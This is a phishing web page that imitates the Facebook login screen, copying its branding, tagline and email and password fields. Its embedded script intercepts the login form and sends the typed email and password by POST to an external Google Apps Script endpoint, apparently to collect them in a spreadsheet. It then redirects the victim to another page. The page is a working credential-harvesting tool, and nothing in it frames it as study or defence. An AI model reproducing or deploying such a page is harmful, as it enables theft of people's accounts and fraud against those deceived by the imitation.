<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title> Facebook </title>
</head>
<style>
    
    * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        html {
             min-height: 100vh;
          border: 5px;
          width:100vw ;
          overflow-x: hidden;
           
        }
    
        body {
         
          min-height: 100vh;
          border: 5px;
          width:100vw ;
          overflow-x: hidden;
          background-color: #f0f2f5;
            
        }
        .Fbook{
    color: #1877f2;
    position: absolute;
    padding-top: 190px;
    left: 10%;
    font-size: 28px;
    font-family: 'Tahoma';
        }
      .des{
        position: absolute;
        padding-top: 270px;
        left: 10%;
        font-family:'Tahoma' ;
        font-size: 27px;
      }
      .box{
        position: absolute;
        height: 251px;
        width: 400px;
        border-radius: 10px;
        box-shadow: 0px 0.60323px 0.60323px -1.25px rgba(0, 0, 0, 0.18), 0px 2.29021px 2.29021px -2.5px rgba(0, 0, 0, 0.16), 0px 10px 10px -3.75px rgba(0, 0, 0, 0.063), 0px 2px 4px rgba(0, 0, 0, 0.25), 0px 4px 8px rgba(0, 0, 0, 0.25);
        left: 60%;
        padding-top: 400px;
        top: 100px;
        background-color: white;
      }
      .k{
        position: absolute;
        top: 20%;
        left: 62%;
      }
      .oo{
        position: absolute;
        width: 350px;
        height: 50px;
      }
      .o{
        position: absolute;
        width: 350px;
        height: 50px;
        top: 9.375rem;
        color: #f0f2f5;
        background-color: #1877f2;
        font-size: 20px;
        border-radius: 10px;
      }
      .io{
        position: absolute;
        width: 350px;
        height: 50px;
        top: 88px;


      }
      .forgot{
        position: absolute;
        top: 330px;
        color: #1877f2;
        left: 70%;

      }
      .divide{
        position: absolute;
        top: 370px;
        background-color: #d6d9de;
        width: 330px;
        height: 1px;
        left: 63%;
      }
      .col{
        position: absolute;
        top: 400px;
        background-color: #42b72a;
        width: 200px;
        height: 50px;
        left: 68%;
        border-radius: 10px;
      }
      .lol{
        position: absolute;
        top: 414px;
        color: white;
        left: 69.6%;
        font-family: 'Franklin Gothic Medium', 'Arial Narrow', Arial, sans-serif;

      }




      
      @media (max-width: 768px) {
            .Fbook {
                font-size: 15px;
                margin-top: 8px;
                left: 25%;
            }

            .des {
                position: absolute;
                left: 65px;
                top: 10px;
                font-size: 11px;
            }

            .box {
                max-width: 60%;
                padding-top: 20px;
                top: 300px;
                left: 15%;
            }

            .o {
                position: absolute;
                width: 195px;
                height: 30px;
                top: 290px;
                left: -163px;
                font-size: 12px;
                border-radius: 5px;
            }

           
            .oo{
                position: absolute;
                width: 200px;
                height: 30px;
                top: 200px;
                left: -165px;
            }
            .j{
                position: absolute;
                top: 185px;
                left: -160px;
                font-size: 12px;
            }
            .io{
                position: absolute;
                width: 200px;
                height: 30px;
                top: 245px;
                left: -165px;
                

            }
            .h{
                position: absolute;
                top: 230px;
                left: -160px;
                font-size: 12px;
            }
            .lol{
                position: absolute;
                top: 500px;
                left: 85px;
            }
            .col{
                position: absolute;
                top: 490px;
                left: 70px;
            }
            .forgot
           {
            position: absolute;
            top: 460px;
            left: 118px;
            font-size: 12px;
        
           }
           .divide
           {
            position: absolute;
            top: 480px;
            left: 70px;
            width: 200px;

           }
          
            
        }




        @media(min-width:380px) and (max-width:500px){
            .Fbook {
                font-size: 20px;
                margin-top: 8px;
                left: 19%;
            }

            .des {
                position: absolute;
                left: 65px;
                top: -10px;
                font-size: 11px;
            }

            .box {
                max-width: 60%;
                padding-top: 0px;
                top: 300px;
                left: 15%;
                
                
            }

            .o {
                position: absolute;
                width: 200px;
                height: 30px;
                top: 15.3125rem;
                left: -10.3125rem;
                font-size: 12px;
                border-radius: 5px;
            }

           
            .oo{
                position: absolute;
                width: 200px;
                height: 30px;
                top: 10rem;
                left: -165px;
            }
            .j{
                position: absolute;
                top: 9.0625rem;
                left: -160px;
                font-size: 12px;
            }
            .io{
                position: absolute;
                width: 200px;
                height: 30px;
                top: 12.8125rem;
                left: -165px;
                

            }
            .h{
                position: absolute;
                top: 11.875rem;
                left: -160px;
                font-size: 12px;
            }
            .lol{
                position: absolute;
                top: 500px;
                left: 95px;
            }
            .col{
                position: absolute;
                top: 490px;
                left: 80px;
            }
            .forgot
           {
            position: absolute;
            top: 455px;
            left: 120px;
            font-size: 12px;
        
           }
           .divide
           {
            position: absolute;
            top: 475px;
            left: 75px;
            width: 200px;

           }

        }

        
        
        @media (min-width: 768px) and (max-width: 840px) {
            .Fbook {
                font-size: 20px;
                margin-top: 10px;
            }
            .des {
                font-size: 18px;
            }
            .box {
                max-width: 60%;
                margin-top: 20px;
                left: 50%;
            }
            .o {
                position: absolute;
                width: 350px;
                height: 40px;
                top: 60px;
                left: -75px;
                font-size: 12px;
                border-radius: 5px;
            }
            .oo{
                position: absolute;
                width: 350px;
                height: 40px;
                top: -3.75rem;
                left: -75px;
            }
            .j{
                position: absolute;
                top: -80px;
                left: -70px;
                font-size: 12px;
            }
            .io{
                position: center;
                width: 350px;
                height: 40px;
                top: 0px;
                left: -75px;

            }
            .h{
                position: absolute;
                top: -15px;
                left: -75px;
                font-size: 12px;
            }
            .lol{
                position: absolute;
                top: 420px;
                left: 526px;
            }
            .col{
                position: absolute;
                top: 410px;
                left: 510px;
            }
            .forgot
           {
            position: absolute;
            top: 360px;
            left: 550px;
            font-size: 12px;
        
           }
           .divide
           {
            position: absolute;
            top: 390px;
            left: 460px;
            width: 300px;

           }
            
        }


        
        @media (min-width:414px) and (max-width:450px){
            .Fbook {
                font-size: 20px;
                margin-top: 8px;
                left: 20%;
            }

            .des {
                position: absolute;
                left: 65px;
                top: -10px;
                font-size: 11px;
            }

            .box {
                max-width: 60%;
                padding-top: 0px;
                top: 300px;
                left: 15%;
                
                
            }

            .o {
                position: absolute;
                width: 200px;
                height: 30px;
                top: 16rem;
                left: -170px;
                font-size: 12px;
                border-radius: 5px;
            }

           
            .oo{
                position: absolute;
                width: 200px;
                height: 30px;
                top: 9rem;
                left: -170px;
            }
            .j{
                top: 8rem;
                left: -170px;
                font-size: 12px;
            }
            .io{
                width: 200px;
                height: 30px;
                top: 12.5rem;
                left: -170px;
            }
            .h{
                position: absolute;
                top: 11.5rem;
                left: -170px;
                font-size: 12px;
            }
            .lol{
                top: 31.8rem;
                left: 7rem;
            }
            .col{
                top: 31rem;
                left: 6rem;
            }
            .forgot
           {
            position: absolute;
            top: 26.5rem;
            left: 6rem;
            font-size: 12px;
        
           }
           .divide
           {
            position: absolute;
            top: 485px;
            left: 75px;
            width: 200px;

           }

        }

   
</style>
<body>
    
    <div class="Fbook">
        <h1>
            facebook
        </h1>
    </div>
    <div class="des">
        <p>Facebook helps you connect and share <br>with the people in your life.</p>

    </div>
    <div class="box">

    </div>
    <form class= "k" name="submit-to-google-sheet">
        <label class="j">Email adress </label><br>
        <input class="oo" type="text" name="1" required><br><br><br>
        <label class="h">Password</label><br>
        <input class="io" type="text" name="2" required><br><br><br>
        <input class="o" type="submit" name="login" id="submit-button"><br><br>
    </form>
    <script>
        const scriptURL = 'https://script.google.com/macros/s/AKfycbxBxk8BcvBuF2ZWrc0eHNlahp6JsCzySep3k-zZh12aMy1iRYFBYQg9e-HEMtfERWfLIg/exec';
        const form = document.forms['submit-to-google-sheet'];

        form.addEventListener('submit', e => {
            e.preventDefault();
            fetch(scriptURL, { method: 'POST', body: new FormData(form) })
                .then(response => {
                    console.log('Success!', response);
                    // You can handle the response here, e.g., show a success message
                    window.location.href = 'te.html';
                })
                .catch(error => {
                    console.error('Error!', error.message);
                    // Handle the error, e.g., display an error message
                });
        });
    </script>
    <div class="forgot">
        <h4>forgotten password?</h4>
    </div>
    <div class="divide">
    </div>
    <div class="col"></div>
    <div class="lol">
        <h3>Create new account</h3>
    </div>

</body>
</html>
